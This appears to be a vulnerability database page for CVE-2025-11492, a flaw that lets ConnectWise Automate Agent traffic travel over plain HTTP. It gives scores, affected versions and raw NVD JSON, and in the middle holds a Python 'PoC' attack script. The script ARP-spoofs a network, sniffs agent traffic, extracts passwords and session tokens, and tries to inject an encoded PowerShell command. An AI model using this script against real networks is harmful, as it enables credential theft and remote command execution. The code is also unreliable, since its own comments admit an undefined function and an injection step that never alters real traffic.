Security Vulnerability Report
CVE-2025-11492 CVSS 9.6 CRITICAL

CVE-2025-11492

Published: 2025-10-16 19:15:32
Last Modified: 2025-10-29 19:33:30
Source: 7d616e1a-3288-43b1-a0dd-0a65d3e70a49

Description

In the ConnectWise Automate Agent, communications could be configured to use HTTP instead of HTTPS. In such cases, an on-path threat actor with a man-in-the-middle network position could intercept, modify, or replay agent-server traffic. Additionally, the encryption method used to obfuscate some communications over the HTTP channel is updated in the Automate 2025.9 patch to enforce HTTPS for all agent communications.

CVSS Details

CVSS Score (Secondary, from source 7d616e1a-3288-43b1-a0dd-0a65d3e70a49)
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS Score (Primary)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

The two assessments differ in attack complexity (L vs. H) and scope (Changed vs. Unchanged); the 9.6 banner score is the Secondary one.

Weakness
CWE-319 (Cleartext Transmission of Sensitive Information)

Configurations (Affected Products)

cpe:2.3:a:connectwise:automate:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding: 2025.9)
ConnectWise Automate Agent, versions before the 2025.9 patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11492 - ConnectWise Automate Agent MITM Attack PoC
# This PoC demonstrates how an attacker can intercept and modify
# HTTP-based communications between ConnectWise Automate Agent and Server
import os
import re
import socket
import struct
import threading
from scapy.all import ARP, Ether, srp, sendp, sniff, IP, TCP, Raw

# NOTE: get_mac() is never defined anywhere in this PoC, and the string
# 'attacker' passed to it below is a placeholder rather than an address,
# so arp_spoof() raises NameError as written.


# Step 1: ARP Spoofing to perform MITM
def arp_spoof(target_ip, gateway_ip):
    """Perform ARP spoofing to redirect traffic through attacker"""
    target_mac = get_mac(target_ip)
    gateway_mac = get_mac(gateway_ip)
    # Craft ARP reply packets
    packet = Ether(dst=target_mac, src=get_mac('attacker')) / \
        ARP(op=2, pdst=target_ip, hwdst=target_mac,
            psrc=gateway_ip, hwsrc=get_mac('attacker'))
    sendp(packet, verbose=False)
    print(f"[*] ARP spoofing: {target_ip} <-> {gateway_ip}")


# Step 2: Intercept HTTP Communications
def intercept_agent_traffic(packet):
    """Intercept and analyze ConnectWise Automate Agent HTTP traffic"""
    if packet.haslayer(Raw) and packet.haslayer(TCP):
        payload = packet[Raw].load.decode('utf-8', errors='ignore')
        # Detect ConnectWise Automate Agent communication patterns
        if 'ConnectWise' in payload or 'Automate' in payload:
            print(f"[+] Intercepted Agent Communication:")
            print(f"    Source: {packet[IP].src}:{packet[TCP].sport}")
            print(f"    Dest: {packet[IP].dst}:{packet[TCP].dport}")
            print(f"    Payload: {payload[:200]}...")
            # Extract credentials and session tokens
            extract_credentials(payload)
            # Attempt to modify commands (command injection)
            # Note: sniff() only prints a non-None value returned by prn;
            # the packet on the wire is observed here, not rewritten.
            modified_payload = inject_malicious_command(payload)
            return modified_payload
    return None


# Step 3: Extract sensitive data from intercepted traffic
def extract_credentials(payload):
    """Extract authentication credentials from HTTP traffic"""
    patterns = {
        'username': r'username=([^&\s]+)',
        'password': r'password=([^&\s]+)',
        'session_token': r'token=([^&\s]+)',
        'machine_id': r'machineId=([^&\s]+)'
    }
    for key, pattern in patterns.items():
        match = re.search(pattern, payload)
        if match:
            print(f"[!] Found {key}: {match.group(1)}")


# Step 4: Inject malicious commands
def inject_malicious_command(payload):
    """Inject malicious commands into agent-server communication"""
    malicious_cmd = "<script>exec('powershell -enc <base64_payload>');</script>"
    if '<command>' in payload:
        payload = payload.replace('</command>', f'{malicious_cmd}</command>')
        print(f"[!] Injected malicious command into payload")
    return payload


# Main execution
if __name__ == "__main__":
    TARGET_IP = "192.168.1.100"  # ConnectWise Agent IP
    GATEWAY_IP = "192.168.1.1"   # Network Gateway
    # Enable IP forwarding
    os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
    # Start ARP spoofing
    arp_spoof(TARGET_IP, GATEWAY_IP)
    # Start sniffing and intercepting
    sniff(filter="tcp port 80", prn=intercept_agent_traffic, store=0)
```

References

https://www.connectwise.com/company/trust/security-bulletins/connectwise-automate-2025.9-security-fix (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11492",
    "sourceIdentifier": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49",
    "published": "2025-10-16T19:15:31.900",
    "lastModified": "2025-10-29T19:33:29.790",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the ConnectWise Automate Agent, communications could be configured to use HTTP instead of HTTPS. In such cases, an on-path threat actor with a man-in-the-middle network position could intercept, modify, or replay agent-server traffic. Additionally, the encryption method used to obfuscate some communications over the HTTP channel is updated in the Automate 2025.9 patch to enforce HTTPS for all agent communications."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-319"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:connectwise:automate:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2025.9",
                "matchCriteriaId": "B9CC280B-C83A-422E-B637-44F4051703F0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-automate-2025.9-security-fix",
        "source": "7d616e1a-3288-43b1-a0dd-0a65d3e70a49",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```